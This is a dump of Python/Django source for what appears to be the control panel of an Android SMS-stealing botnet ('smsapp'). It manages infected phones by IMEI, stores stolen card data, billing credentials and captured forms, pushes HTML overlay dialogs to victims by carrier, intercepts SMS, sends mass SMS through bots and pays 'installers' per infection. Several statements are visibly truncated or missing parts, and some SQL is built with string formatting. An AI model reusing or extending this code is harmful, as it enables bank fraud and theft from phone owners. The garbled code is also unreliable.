settings.MONGO['extra_data'].find({'data.type': "billing credentials"}).distinct('') for t in ts: acc_types.append((t, t)) class AccTypeForm(forms.Form): t1 = forms.ChoiceField(choices=acc_types, label=_("account type"), required=False) type_filter = {'type': 'userdata', 'data.type': 'billing credentials'} if request.POST.get('t1'): type_filter[''] = request.POST.get('t1') info = settings.MONGO['extra_data'].find(type_filter) cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/info/bill.html', {'accounts': info, 'cl': cl, 'type_form': AccTypeForm(request.POST or None)}) @admin_user_required def forms_info_list(request): info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'forms'}) cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/info/forms_list.html', {'forms': info, 'cl': cl}) @admin_user_required def forms_info_details(request, objid): obj = settings.MONGO['extra_data'].find_one(ObjectId(objid)) cl = {'opts': {'app_label': "smsapp"}} # todo: old forms forms_ = obj['data']['forms'] return render(request, 'admin/smsapp/info/form_details.html', {'form1': forms_.get('first window'), 'form2': forms_.get('second window'), 'cl': cl}) @admin_user_required def html_form_details(request, objid): obj = settings.MONGO['extra_data'].find_one(ObjectId(objid)) cl = {'opts': {'app_label': "smsapp"}} form = obj['data'] return render(request, 'admin/smsapp/info/html_form_details.html', {'form': form, 'cl': cl}) @admin_user_required def html_forms_list(request): info = settings.MONGO['extra_data'].find({'type': 'userdata', 'data.type': 'js_form'}) cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/info/html_forms_list.html', {'forms': info, 'cl': cl}) @admin_user_required def top_apps(request): def get_country_choices(): import pycountry choices = [(None, '----')] for d in models.PhoneData.objects.order_by('country').distinct().values('country'): ccode = d['country'] try: c = pycountry.countries.get(alpha2=ccode) choices.append((ccode, except KeyError: logger.error("Unknown country: {0}".format(ccode)) return choices class CountryForm(forms.Form): country = forms.ChoiceField(choices=get_country_choices()) cl = {'opts': {'app_label': "smsapp"}} if request.POST.get('country'): ta = models.InstalledApp.objects.get_top_apps_by_country(request.POST.get('country')) else: ta = models.InstalledApp.objects.get_top_apps() return render(request, 'admin/smsapp/info/apps.html', {'cl': cl, 'apps': ta, 'country_form': CountryForm(request.POST or None)}) # noinspection PyUnusedLocal @admin_user_required def view_bot(request, code=None): if code is None and request.method == 'POST': code = request.POST.get('code') phone = get_object_or_404(models.PhoneData, uniq_id=code) return redirect('admin:smsapp_phonedata_change', @admin_user_required def mass_sms_send(request): class MassSMSForm(forms.Form): sms_to = forms.CharField(max_length=255) sms_text = forms.CharField(widget=forms.Textarea) fm = MassSMSForm(request.POST or None) if fm.is_valid(): logger.debug("Sending SMSs") phones = models.PhoneData.objects.raw( "SELECT * FROM smsapp_phonedata WHERE last_connection >= NOW() - INTERVAL '15 minutes'") for p in phones: logger.debug("Sending SMS to online phone {0}".format(p)) commands.send_sms(p, fm.cleaned_data['sms_to'], fm.cleaned_data['sms_text']) cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/utils/mass_sms.html', {'cl': cl, 'sms_form': fm}) @admin_user_required def country_list_admin(request): countries = models.PhoneData.objects.get_country_list_total() cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/info/countries.html', {'cl': cl, 'data': countries}) @admin_user_required def option_blacklist(request): class BlacklistForm(forms.Form): content = forms.CharField(widget=forms.Textarea) opt, created = models.Option.objects.get_or_create(name="blacklist") fm = BlacklistForm(request.POST or None, initial={'content': opt.content}) if fm.is_valid(): opt.content = fm.cleaned_data.get("content") messages.success(request, "Saved") return redirect('admin:index') cl = {'opts': {'app_label': "smsapp"}} return render(request, 'admin/smsapp/utils/blacklist.html', {'cl': cl, 'form': fm}) @admin_user_required def crash_report(request, oid): o = settings.MONGO['extra_data'].find_one(ObjectId(oid)) d = {'code': o['code'], 'data': o['data']} return render(request, 'admin/smsapp/phonedata/view_report.html', d) ``` #### File: smsg_r/smsapp/ ```python import logging from django import forms from django.conf import settings from django.contrib import admin from django.forms import Form from django.http import HttpResponseRedirect from django.shortcuts import render from django.utils.translation import ugettext_lazy as _ # Register your models here. from django.contrib.auth.admin import UserAdmin from django.contrib.auth.forms import UserCreationForm, UserChangeForm import html5 import remote_dialog from . import commands, cfields from .models import SysUser, Installer, PhoneData, RemoteDialog, LogRecord, SMSRecord, InternalSMS, \ operator_code_to_full_name, AppDialog logger = logging.getLogger(__name__) class MyAdminSite(admin.AdminSite): index_template = "admin/home.html" admin_site = MyAdminSite() = admin_site def autodiscover(): """ Autodiscover function from django.contrib.admin """ import copy from django.conf import settings from django.utils.importlib import import_module from django.utils.module_loading import module_has_submodule for app in settings.INSTALLED_APPS: mod = import_module(app) before_import_registry = None try: before_import_registry = copy.copy( import_module('%s.admin' % app) except: = before_import_registry if module_has_submodule(mod, 'admin'): raise class SysUserAddForm(UserCreationForm): class Meta: model = SysUser fields = ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>') class SysUserChangeForm(UserChangeForm): class Meta: model = SysUser fields = ('jabber',) class UserProfileAdmin(UserAdmin): fieldsets = ( (None, {'fields': ('username', 'password', '<PASSWORD>')}), (_('Permissions'), {'fields': ('is_active', 'is_staff', 'is_superuser', 'groups', 'user_permissions')}), (_('Important dates'), {'fields': ('last_login', 'date_joined')}), ) add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('username', '<PASSWORD>', '<PASSWORD>', '<PASSWORD>')} ), ) list_display = ['username', 'date_joined'] form = SysUserChangeForm add_form = SysUserAddForm, UserProfileAdmin) class InstallerAddForm(UserCreationForm): class Meta: model = Installer fields = ('username', '<PASSWORD>', '<PASSWORD>', 'user_id') class InstallerChangeForm(UserChangeForm): class Meta: model = Installer fields = ('username', 'user_id') class InstallerProfileAdmin(UserAdmin): fieldsets = ( (None, {'fields': ('username', 'password', 'user_id',)}), (_('Important dates'), {'fields': ('last_login', 'date_joined')}), ) add_fieldsets = ( (None, { 'classes': ('wide',), 'fields': ('username', '<PASSWORD>', '<PASSWORD>', 'user_id',)} ), ) actions = ('mark_as_paid',) list_display = ['username', 'user_id'] form = InstallerChangeForm add_form = InstallerAddForm def mark_as_paid(self, request, queryset): """ @type request: HttpRequest @type queryset: QuerySet """ count = 0 for usr in queryset.all(): count += 1 usr.phonedata_set.all().update(paid=True) self.message_user(request, "Marked phones as paid for {0} users".format(count)) mark_as_paid.short_description = _("Mark phones for selected users as paid"), InstallerProfileAdmin) class PhoneNumberFilter(admin.SimpleListFilter): title = _("Phone number") parameter_name = "number" def lookups(self, request, model_admin): return ( ('valid', _("Valid")), ('invalid', _("Invalid")), ) def queryset(self, request, queryset): """ @type request: HttpRequest @type queryset: QuerySet @rtype: QuerySet """ if self.value() == 'valid': return queryset.filter(number__startswith='+') elif self.value() == 'invalid': return queryset.exclude(number__startswith='+') class AppInstalledFilter(admin.SimpleListFilter): title = _("Installed app") parameter_name = "app" def lookups(self, request, model_admin): return ( (None, 'None'), ) def queryset(self, request, queryset): if request.GET.get('app'): return queryset.filter(installedapp__name=request.GET.get('app')) return queryset class SMSSenderFilter(admin.SimpleListFilter): title = _("SMS Senders") parameter_name = "sender" def lookups(self, request, model_admin): return ( (None, 'None'), ) def queryset(self, request, queryset): if request.GET.get('sender'): return queryset.filter(internalsms__sender__id=request.GET.get('sender')).distinct() return class CountryFilter(admin.SimpleListFilter): title = _("Country") parameter_name = "country" def lookups(self, request, model_admin): return ( (None, 'None'), ) def queryset(self, request, queryset): cc = request.GET.get(self.parameter_name) if cc: return queryset.filter(country=cc) return queryset class OnlineFilter(admin.SimpleListFilter): title = _("Online") parameter_name = 'online' def lookups(self, request, model_admin): return ( (1, _("Yes")), ) def queryset(self, request, queryset): if self.value() == '1': from datetime import datetime, timedelta then = datetime.utcnow() - timedelta(minutes=15) return queryset.filter(last_connection__gt=then) return queryset class PhoneDataAdminForm(forms.ModelForm): class Meta: model = PhoneData widgets = { 'number': html5.Html5PhoneInput(attrs={'size': '14'}), } exclude = () class PhoneDataAdmin(admin.ModelAdmin): list_per_page = 50 list_display = ['imei', 'uniq_id', 'work_time', 'last_connect', 'has_card', 'number', 'country', ] list_editable = ['number', 'country', ] list_filter = ( 'id_sent', 'inactive', 'installer', 'paid', PhoneNumberFilter, OnlineFilter, AppInstalledFilter, SMSSenderFilter, CountryFilter ) actions = ('send_id_command', 'send_dialogs', ) form = PhoneDataAdminForm def get_changelist_form(self, request, **kwargs): # return super(PhoneDataAdmin, self).get_changelist_form(request, **kwargs) return PhoneDataAdminForm def work_time(self, obj): """ @type obj: PhoneData """ return obj.get_work_time() work_time.admin_order_field = 'registered' work_time.short_description = _("Work time") def last_connect(self, obj): """ @type obj: PhoneData """ return obj.since_last_connection() last_connect.admin_order_field = 'last_connection' last_connect.short_description = _("Last connection") def has_card(self, obj): """ @type obj: PhoneData """ d = settings.MONGO['extra_data'].find_one( {'type': 'userdata', 'data.type': 'card information', 'code': obj.uniq_id}) if d: return "Y" return "" has_card.short_description = _("Card") = True class SendIDForm(forms.Form): _selected_action = forms.CharField(widget=forms.MultipleHiddenInput) phone = forms.CharField(max_length=32) def send_id_command(self, request, queryset): """ @type request: HttpRequest @type queryset: QuerySet """ form = None if 'apply' in request.POST: form = self.SendIDForm(request.POST) if form.is_valid(): phone = form.cleaned_data['phone'] count = 0 for p in queryset: # p.tags.add(phone) commands.send_id(p, phone) logger.debug("Sending ID to {0}".format(p)) count += 1 plural = '' if count != 1: plural = 's' self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural)) return HttpResponseRedirect(request.get_full_path()) if not form: form = self.SendIDForm(initial={'_selected_action': queryset.values_list('id', flat=True)}) return render(request, 'admin/smsapp/phonedata/sentid_form.html', {'phones': queryset, 'send_form': form, }) send_id_command.short_description = _("Send ID SMS from selected phones") def change_view(self, request, object_id, form_url='', extra_context=None): extra_context = extra_context or {} collection = settings.MONGO['extra_data'] phone_extras = [] p = PhoneData.objects.get(pk=object_id) for rec in collection.find({'code': p.uniq_id, 'type': 'userdata'}): try: phone_extras.append({'title': rec['data']['type'], 'records': rec['data']}) except KeyError: pass extra_context['extras'] = phone_extras extra_context['uniq_id'] = p.uniq_id return super(PhoneDataAdmin, self).change_view(request, object_id, form_url, extra_context) class DialogsForm(forms.Form): _selected_action = forms.CharField(widget=forms.MultipleHiddenInput) dialog = forms.ModelChoiceField(help_text=_("Select dialog to send"), queryset=RemoteDialog.objects.all()) # noinspection PyMethodMayBeStatic def send_dialogs(self, request, queryset): form = None if 'apply' in request.POST: form = self.DialogsForm(request.POST) if form.is_valid(): dlg = form.cleaned_data.get('dialog') count = 0 for p in queryset: remote_dialog.push_dialog(p.uniq_id, dlg) logger.debug("Pushed dialog {0} to phone {1}".format(dlg, p)) count += 1 plural = '' if count != 1: plural = 's' self.message_user(request, "Successfully sent to {0:d} phone{1:s}.".format(count, plural)) return HttpResponseRedirect(request.get_full_path()) if not form: form = self.DialogsForm(initial={'_selected_action': queryset.values_list('id', flat=True)}) return render(request, 'admin/smsapp/remotedialog/send_dialogs_form.html', {'dialogs_form': form, 'phones': queryset}) send_dialogs.short_description = _("Send specified dialogs to phones"), PhoneDataAdmin) class LogRecordAdmin(admin.ModelAdmin): list_per_page = 50 change_list_template = "admin/smsapp/logrecord/list.html" list_display = ('registered', 'contents',) def get_model_perms(self, request): return {} def changelist_view(self, request, extra_context=None): extra_context = extra_context or {} extra_context['title'] = _('Log records') return super(LogRecordAdmin, self).changelist_view(request, extra_context) def get_queryset(self, request): return super(LogRecordAdmin, self).get_queryset(request).order_by('-registered'), LogRecordAdmin) class SMSAdmin(admin.ModelAdmin): list_per_page = 50 list_display = ('source', 'phone', 'owner', 'contents', 'billing_status') list_filter = ('billing_status',) list_editable = ('billing_status',), SMSAdmin) class OperatorCodeForm(forms.ModelForm): def __init__(self, *args, **kwargs): super(OperatorCodeForm, self).__init__(*args, **kwargs) try: country = self.initial.get('operator')[:3] self.fields['operator'].widget.widgets[1].choices = cfields.get_operator_choices(country) except ValueError: pass except TypeError: pass class Meta: model = RemoteDialog widgets = { 'operator': cfields.OperatorWidget() } exclude = () class DialogAdmin(admin.ModelAdmin): list_display = ('id', 'operator_name', 'priority', 'description',) list_editable = ('priority',) form = OperatorCodeForm fieldsets = ( (None, {'fields': ('operator', 'priority', 'description', 'delay', 'restart')}), ("Dialogs", {'fields': ('dlg1', )}), ("HTML content", {'fields': ('html_contents',)}) ) def operator_name(self, val): return operator_code_to_full_name(val.operator) operator_name.short_description = _("Operator"), DialogAdmin) class InternalSMSAdmin(admin.ModelAdmin): list_display = ('sender', 'created', 'phone') list_filter = ('sender',) def has_add_permission(self, request): return False # noinspection PyMethodMayBeStatic def sender_stats(self, request): def get_country_choices(): import pycountry choices = [(None, '----')] for d in PhoneData.objects.order_by('country').distinct().values('country'): ccode = d['country'] try: c = pycountry.countries.get(alpha2=ccode) choices.append((ccode, except KeyError: logger.debug("Unknown country: {0}".format(ccode)) return choices class CountryForm(Form): country = forms.ChoiceField(choices=get_country_choices()) if request.POST.get('country'): ls = InternalSMS.objects.get_sender_stats_by_country(request.POST.get('country')) else: ls = InternalSMS.objects.get_sender_stats() cl = {'opts': {'app_label': "smsapp"}, 'result_list': ls} return render(request, 'admin/smsapp/internalsms/topsenders.html', {'cl': cl, 'country_form': CountryForm(request.POST or None)}) def get_urls(self): from django.conf.urls import patterns, url urls = super(InternalSMSAdmin, self).get_urls() my_urls = patterns( '', url(r'^senders$',, name='sender_stats') ) return urls + my_urls, InternalSMSAdmin) class AppDialogAdmin(admin.ModelAdmin): list_display = ('description',), AppDialogAdmin) ``` #### File: smsg_r/smsapp/ ```python import random import cPickle __cachefile = 'pygpw_tris_cache.cpickle' _lowercase = 'abcdefghijklmnopqrstuvwxyz' _uppercase = _lowercase.upper() _vowels = 'aeiou' _numbers = '0123456789' _symbols = '`~!@#$%^&*()-=_+[]{}\\|;:\'",.<>/?' _leet_table = { # lowercase: ([singlechar_substs],[multichar_substs]) 'a': (['4', '@', '^'], ['/\\', '/-\\']), 'b': (['6', '8', '&'], ['|3', '13', 'I3']), 'c': (['<', '(', '{'], []), 'd': ([], ['|)', '])', '[)', 'I>', '|>']), 'e': (['3', '&'], []), 'f': ([], ['ph', '|=', ']=', 'I=']), 'g': (('9', '6'), ['(_+']), 'h': ([], ['/-/', ']-[', '|-|', '}{', '}-{']), 'i': (('1', '|', '!'), []), 'j': ([], ['_|', '_/', '_7']), 'k': ([], ['|<', '|{']), 'l': (['|'], ['|_', ]), 'm': ([], ['/\\/\\', '|V|', '||', '[V]', '|\\/|', '/|\\', '/|/|', '/V\\']), 'n': (['~'], ['|\\|', '/\\/', '|\\', ']\\[']), 'o': (['0', ], ['()', '[]']), 'p': (['?'], ['|*', '|o', '|>', '|D']), 'q': (['9'], ['()_', 'O_', '0_', '<|']), 'r': (['2'], ['12', '|?', '/2', '|~', '|2', '|`', 'l2']), 's': (['5', '$', 'z'], []), 't': (['+', '7'], ['-|-', ]), 'u': ([], ['|_|', '[_]', '\_/', '\\_\\', '/_/', '(_)']), 'v': ([], ['\\/']), 'w': ([], ['\\/\\/', 'VV', '\\^/', '\\V/', '\\|/']), 'x': (['%', '*'], ['><', '}{']), 'y': ([], ['`/']), 'z': (['2', 's'], ['7_']), } _tris = None _sigma = None def _docache(): """ (re)build cache using cPickle. This will be automatically called if the cachefile is not found, so you can recreate the cache by simply deleting the existing one """ # load tris # calculate the sigma value: the probability total of the trigraph set # sigma calculation result is cached, since source is relatively static. from smsapp.idgen_tris import tris sigma = 0 for c1 in xrange(26): for c2 in xrange(26): for c3 in xrange(26): sigma += tris[c1][c2][c3] # tris cached since cPickle has superior I/O speed than .pyc marshalling dumpobj = (tris, sigma) # dump tuple fhw = open(__cachefile, 'w') cPickle.dump(dumpobj, fhw) fhw.close() def _readcache(): """get the trigraph data from cachefile. returns a tuple (t,s) where t is the matrix and s is the sigma value""" fh = None try: fh = open(__cachefile, 'r') except: # build if does not exist _docache() fh = open(__cachefile, 'r') cachedata = cPickle.load(fh) fh.close() return cachedata def gettris(): """get the trigraph probability matrix and sigma value. returns a tuple (t,s) where t is the matrix and s is the sigma value.""" global _tris global _sigma if not _tris or not _sigma: # store into module namespace so future calls require no I/O _tris, _sigma = _readcache() return _tris, _sigma def generate_trigraph(passwordlength=8, alphabet=None, vowels=None): '''Generator''' _alphabet = _lowercase tdata, sigma = gettris() password = [] # append required # pick random starting point # we do it this way so we can be sure to pick a natural english # trigraph as a starting point, not just random gibberish, since # trigraphs with zero english occurrences are never chosen. ranno = int(sigma * random.random()) sum = 0 bail = False for c1 in xrange(26): for c2 in xrange(26): for c3 in xrange(26): sum += tdata[c1][c2][c3] if sum >= ranno: # this is the starting random (but probable) trigraph password.append(_alphabet[c1]) password.append(_alphabet[c2]) password.append(_alphabet[c3]) bail = True # break out of this triply-nested loop if bail: break if bail: break if bail: break # do random walk nchar = 3 while nchar < passwordlength: c1 = _alphabet.find(password[nchar - 2]) c2 = _alphabet.find(password[nchar - 1]) # we have a password ...[c1][c2][?] character triplet # --------->| # (current password) # with c1 and c2 being the last two chars of current password. # want to append another char (i.e. '?') to password. # randomly grab the third ('?') from trigraph table # using probability density defined in that data[c1][c2] list. sum = 0 for c3 in xrange(26): sum += tdata[c1][c2][c3] if sum == 0: # in this unlikely case, we have a c1, c2 pair where there # are zero natural trigraphs starting with [c1][c2] # meaning we cant continue any further. # For correctness, we should break the loop for # this password or try again. # However, another workaround is to 'inject' a random vowel to # continue and finish the rest of this password. # --- Comment out either one of the 2 below lines --- # break password.extend(random.sample(_vowels, 1)) else: ranno = int(random.random() * sum) sum = 0 for c3 in xrange(26): sum += tdata[c1][c2][c3] if sum > ranno: password.append(_alphabet[c3]) break nchar += 1 # end random walk return ''.join(password) def generate_naive(passwordlength=8, vowel_interlace=False, alphabet=_lowercase, vowels=_vowels): '''naive implementation. Set vowel_interlace=True to simulate pronouncable passwords''' pw = [] for pos in xrange(passwordlength): # if vowel_interlace, dont allow two consonants in a row if vowel_interlace and pos > 0 and not pw[pos - 1] in _vowels: pw.extend(random.sample(vowels, 1)) else: pw.extend(random.sample(alphabet, 1)) return "".join(pw) def leetify_string(plain, capitalize_rate=0.5, substitute_rate=0.5, multichar=False): leet = [] c_idx = 0 leet_len = 0 maxchars = len(plain) while leet_len < len(plain): c = plain[c_idx] cl = c.lower() if leet_len == len(plain): break maxchars = len(plain) - leet_len if maxchars == 0: break if random.random() < capitalize_rate: if c == cl: c = c.upper() else: c = c.lower() if random.random() < substitute_rate: single_subs, multi_subs = _leet_table.get(cl, ([c], [])) # try picking a multicharacter substitute that will fit it in if multichar and len(multi_subs) > 0: if maxchars == 1: if len(single_subs) > 0: c = random.sample(single_subs, 1)[0] leet.append(c) c_idx += 1 leet_len += len(c) continue # temporary selection pool of mixed multi and single tmp_subs = [] tmp_subs.extend(single_subs[:]) tmp_subs.extend(multi_subs[:]) tmp = None while len(tmp_subs): tmp = random.sample(tmp_subs, 1)[0] if len(tmp) > maxchars: # remove this subst entry, it's too big tmp_subs.remove(tmp) else: tmp_subs = [] # break inner loop if not tmp is None: if len(tmp) <= maxchars: c = tmp else: if len(single_subs) > 0: c = random.sample(single_subs, 1)[0] leet.append(c) c_idx += 1 leet_len += len(c) # return a output, explain pair return ''.join(leet), plain[:c_idx] _methods = { # name, (func, default kwargs dict) 'trigraph': (generate_trigraph, {}), 'naive': (generate_naive, {'vowel_interlace': True}), 'random': (generate_naive, {'vowel_interlace': False}), } def generate(numpasswords=1, passwordlength=8, method='trigraph', verbose=False, leetify=False, alphabet=_lowercase, vowels=_vowels, explain=False, multichar=False, substitute_rate=0.5, capitalize_rate=0.5): '''main generate loop''' gfunc, kwargs = _methods[method] passlist = [] for i in xrange(numpasswords): pw = gfunc(passwordlength=passwordlength, alphabet=alphabet, vowels=vowels, **kwargs) pw_explain = pw if leetify: pw, pw_explain = leetify_string(pw, multichar=multichar, substitute_rate=substitute_rate, capitalize_rate=capitalize_rate) passlist.append(pw) return passlist class __NP(): @staticmethod def write(x): pass def generate_uniq_id(): """ Generates friendly UUID @return UUID @rtype str """ generate_args = { 'numpasswords': 1, 'passwordlength': 8, 'leetify': False, 'method': 'naive', 'alphabet': _uppercase } p = generate(**generate_args) if p: return "{0:s}{1:02d}".format(p[0], random.randint(0, 99)) ``` #### File: smsg_r/smsapp/ ```python import base64 import logging from datetime import timedelta, datetime import re import HTMLParser from ago import human from django.conf import settings from django.contrib.auth.models import User, UserManager, Permission from django.contrib.contenttypes.models import ContentType from django.core.exceptions import AppRegistryNotReady from django.db import models, connection from django.db.models import Q from django.db.models.signals import post_save from django.db.utils import ProgrammingError from django.dispatch import receiver from django.utils import timezone from django.utils.translation import ugettext_lazy as _ from django_countries.fields import CountryField from smsapp import idgen, commands, cfields logger = logging.getLogger(__name__) DB_HTML_CACHE = "__htmlCache" DB_HTML_VERSION = "__htmlVersion" DB_CACHE_TIMEOUT = 30 class SysUser(User): jabber = models.EmailField(null=True) activation_key = models.CharField(_('activation key'), max_length=40, null=True) objects = UserManager() ACTIVATED = u"ALREADY_ACTIVATED" class Meta: verbose_name = _("System User") verbose_name_plural = _("System Users") def activation_key_expired(self): expiration_date = timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS) return self.activation_key == self.ACTIVATED or (self.date_joined + expiration_date <= activation_key_expired.boolean = True class Installer(User): user_id = models.DecimalField(max_digits=16, decimal_places=0, unique=True) objects = UserManager() class Meta: verbose_name = _("Installer") verbose_name_plural = _("Installers") def __unicode__(self): return self.username def operator_code_to_full_name(code): import mobile_codes import re h = HTMLParser.HTMLParser() a = re.compile("^\d{5,}") if not code or not a.match(code): return code mcc = code[:3] mnc = code[3:] try: op = mobile_codes.mcc_mnc(mcc, mnc) cn = mobile_codes.mcc(mcc) try: return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0].name) except AttributeError: return u"{0} ({1}) - {2}".format(h.unescape(op.operator), mnc, cn[0]) except KeyError: try: cn = mobile_codes.mcc(mcc) except KeyError: return u"Unknown ({0}/{1})".format(mcc, mnc) try: return u"{0} unknown ({1}/{2})".format(, mcc, mnc) except AttributeError: return u"Unknown ({0}/{1})".format(mcc, mnc) class MobileOperator(models.Model): name = models.CharField(max_length=255) def __unicode__(self): return operator_code_to_full_name( # noinspection PyMethodMayBeStatic class PhoneManager(models.Manager): def get_online_list(self): cursor = connection.cursor() query = """ SELECT * FROM smsapp_phonedata WHERE last_connection >= NOW() - INTERVAL '15 minutes' """ cursor.execute(query) return cursor.fetchall() def get_country_list(self, user_id): """ Return list of countries with available phones @param self: this object @param user_id: User ID @type user_id: int @return: set of data @rtype: dict """ cursor = connection.cursor() query = """ SELECT count(id) as total, sum(CASE WHEN (owner_id IS NULL OR owner_id = {0}) AND last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) as available, country FROM smsapp_phonedata WHERE "number" LIKE '+%' AND NOT inactive GROUP BY country ORDER BY available DESC ; """.format(user_id) cursor.execute(query) return cursor.fetchall() def get_country_list_total(self): """ Return list of countries with available phones @param self: this object @return: set of data @rtype: dict """ cursor = connection.cursor() query = """ SELECT count(id) AS total, sum(CASE WHEN last_connection >= NOW() - INTERVAL '15 minutes' THEN 1 ELSE 0 END) AS available, country FROM smsapp_phonedata GROUP BY country ORDER BY available DESC ; """ cursor.execute(query) return cursor.fetchall() def get_active_phones(self, user_id, country_code): """ @param user_id: ID of the user to list phones for @type user_id: int @param country_code: Country code to filter phones @type country_code: str @return: List of phones belonging to country and given user, active during last 15 minutes @rtype: QuerySet of PhoneData """ return self.get_queryset().filter(country=country_code).filter( Q(owner__isnull=True) | Q(owner__id=user_id)).filter(number__startswith='+').filter( - timedelta(minutes=15)) def get_inactive_phones(self): """ @return: list of phones which didn't contact the server for 5 days @rtype: QuerySet of PhoneData """ return self.get_queryset().filter( - timedelta(days=5)).exclude(inactive=True) class PhoneData(models.Model): SMS_INITIAL = 0 SMS_LISTEN = 1 SMS_INTERCEPT = 2 SMS_STATUS = ( (SMS_INITIAL, "None"), (SMS_LISTEN, "Listening"), (SMS_INTERCEPT, "Intercepting") ) SMS_STATUS_DICT = dict(SMS_STATUS) number = models.CharField(max_length=255, null=True, verbose_name=_("Phone #"), db_index=True, blank=True) imei = models.CharField(max_length=255, unique=True, verbose_name=_("H/W ID"), null=True) registered = models.DateTimeField(auto_now_add=True) country = CountryField(max_length=4, null=True, verbose_name=_("Country code"), blank=True, db_index=True) os_version = models.CharField(max_length=128, null=True, verbose_name=_("OS version")) hw_model = models.CharField(max_length=255, null=True, verbose_name=_("Hardware model")) owner = models.ForeignKey(User, verbose_name=_("Assigned to"), null=True, blank=True) uniq_id = models.CharField(max_length=64, null=True, unique=True, verbose_name=_("Unique ID")) operator = models.ForeignKey(MobileOperator, null=True, blank=True, verbose_name=_("Mobile operator")) sms_status = models.IntegerField(default=SMS_INITIAL, choices=SMS_STATUS, verbose_name=_("SMS status")) forwarding_calls = models.CharField(max_length=24, null=True, blank=True, verbose_name=_("Forwarding calls to")) last_connection = models.DateTimeField(null=True, verbose_name=_("Last connection")) id_sent = models.BooleanField(default=False, verbose_name=_("#sentid already sent")) locked = models.BooleanField(default=False, verbose_name=_("Locked")) inactive = models.BooleanField(default=False, verbose_name=_("Inactive"), help_text=_("Set automatically if the phone didn't contact server for 5 days")) installer = models.ForeignKey(Installer, null=True, verbose_name=_("Installer"), related_name='bot_installer') paid = models.BooleanField(default=False, verbose_name=_("Paid to installer")) admin_comment = models.TextField(blank=True, null=True, verbose_name=_("Admin comment")) app_dialogues_version = models.CharField(max_length=255, null=True, blank=True) objects = PhoneManager() class Meta: verbose_name = _("phone") verbose_name_plural = _("phones") index_together = [['number', 'id_sent'], ] def __str__(self): return "IMEI: {0} code: {1}".format(self.imei, self.uniq_id) def is_available(self): """ If this phone is available to users? @return: True if the phone isn't assigned currently @rtype: bool """ return self.owner is None def get_work_time(self): td = - self.registered return human(td, past_tense='{0}', precision=1) def status_desc(self): return self.SMS_STATUS_DICT.get(self.sms_status) def since_last_connection(self): if self.last_connection is None: return "n/a" td = - self.last_connection return human(td, past_tense='{0} ago', precision=1) class UserComment(models.Model): user = models.ForeignKey(SysUser) phone = models.ForeignKey(PhoneData) contents = models.TextField(verbose_name=_("Comment contents")) class Meta: unique_together = (('user', 'phone'),) class BlockedNumber(models.Model): number = models.CharField(max_length=255) phone = models.ForeignKey(PhoneData) class Meta: index_together = [['number', 'phone'], ] verbose_name = _("blocked number") verbose_name_plural = _("blocked numbers") class SMSRecord(models.Model): STATUS_NORMAL = 0 STATUS_REFUNDED = 1 STATUS_DISPUTED = 2 STATUS = ( (STATUS_NORMAL, _("Normal")), (STATUS_REFUNDED, _("Refunded")), (STATUS_DISPUTED, _("Disputed")), ) source = models.CharField(max_length=255, null=True, verbose_name=_("From")) dest = models.CharField(max_length=255, null=True, verbose_name=_("To")) contents = models.TextField(verbose_name=_("SMS Text")) created = models.DateTimeField(auto_now_add=True) phone = models.ForeignKey(PhoneData) owner = models.ForeignKey(SysUser, null=True) intercepted = models.BooleanField(default=False) billing_status = models.IntegerField(choices=STATUS, default=STATUS_NORMAL) class Meta: verbose_name = _("SMS") verbose_name_plural = _("SMS records") class LogRecord(models.Model): registered = models.DateTimeField(auto_now_add=True) contents = models.TextField() @receiver(post_save, sender=PhoneData) def on_phone_create(instance, **kw): """ @param instance: Phone instance to update @type instance: PhoneData """ if instance.uniq_id is None: iid = idgen.generate_uniq_id() instance.uniq_id = iid PhoneData.objects.filter( logger.debug("Updating phone record {0} with new ID {1}".format(instance, iid)) # check if containing a valid # rx = re.compile('^\+') if not rx.match(unicode(instance.number)) and settings.DEFAULT_SENDID_PHONE: # send ID command commands.send_id(instance, settings.DEFAULT_SENDID_PHONE) class RemoteDialog(models.Model): sender = models.CharField(max_length=255, unique=True, null=True, blank=True) app = models.CharField(max_length=255, unique=True, null=True, blank=True) operator = cfields.OperatorField(max_length=32, unique=True, null=True, blank=True) priority = models.DecimalField(decimal_places=0, max_digits=4, default=0) description = models.CharField(max_length=255) delay = models.IntegerField(default=0, verbose_name=_("initial delay"), help_text=_("in minutes")) restart = models.IntegerField(default=0, verbose_name=_("restart interval"), help_text=_("in minutes")) dlg1 = models.TextField(verbose_name=_("first dialog text")) html_contents = models.TextField(verbose_name=_("HTML contents"), null=True, blank=True) class Meta: verbose_name = _("dialog") verbose_name_plural = _("dialogs") def __unicode__(self): return self.description def clean(self): if not self.sender: self.sender = None if not = None if not self.operator: self.operator = None super(RemoteDialog, self).clean() def get_json(self): """ Returns json-compatible representation of the whole dialog @return: All objects in a form that the client understands @rtype: dict """ return { 'ishtml': True, 'start delay minutes': self.delay, 'restart interval minutes': self.restart, 'first dialog': self.dlg1, 'html': base64.b64encode(self.html_contents.encode('utf-8')) if self.html_contents else "", 'correlation id': } class ISender(models.Model): name = models.CharField(max_length=255, unique=True, null=False) def __unicode__(self): return class Meta: verbose_name = _("internal SMS sender") verbose_name_plural = _("internal SMS senders") class InternalSMSManager(models.Manager): # noinspection PyMethodMayBeStatic def get_sender_stats(self): cursor = connection.cursor() query = """ SELECT i.sender_id,, COUNT(DISTINCT i.phone_id) AS num_used FROM smsapp_internalsms AS i, smsapp_isender AS s WHERE GROUP BY i.sender_id, HAVING COUNT(DISTINCT i.phone_id) > 1 ORDER BY num_used DESC """ cursor.execute(query) return cursor.fetchall() # noinspection PyMethodMayBeStatic def get_sender_stats_by_country(self, country_code): cursor = connection.cursor() query = """ SELECT i.sender_id,, COUNT(DISTINCT i.phone_id) AS num_used FROM smsapp_internalsms AS i, smsapp_isender AS s, smsapp_phonedata as p WHERE AND AND GROUP BY i.sender_id, HAVING COUNT(DISTINCT 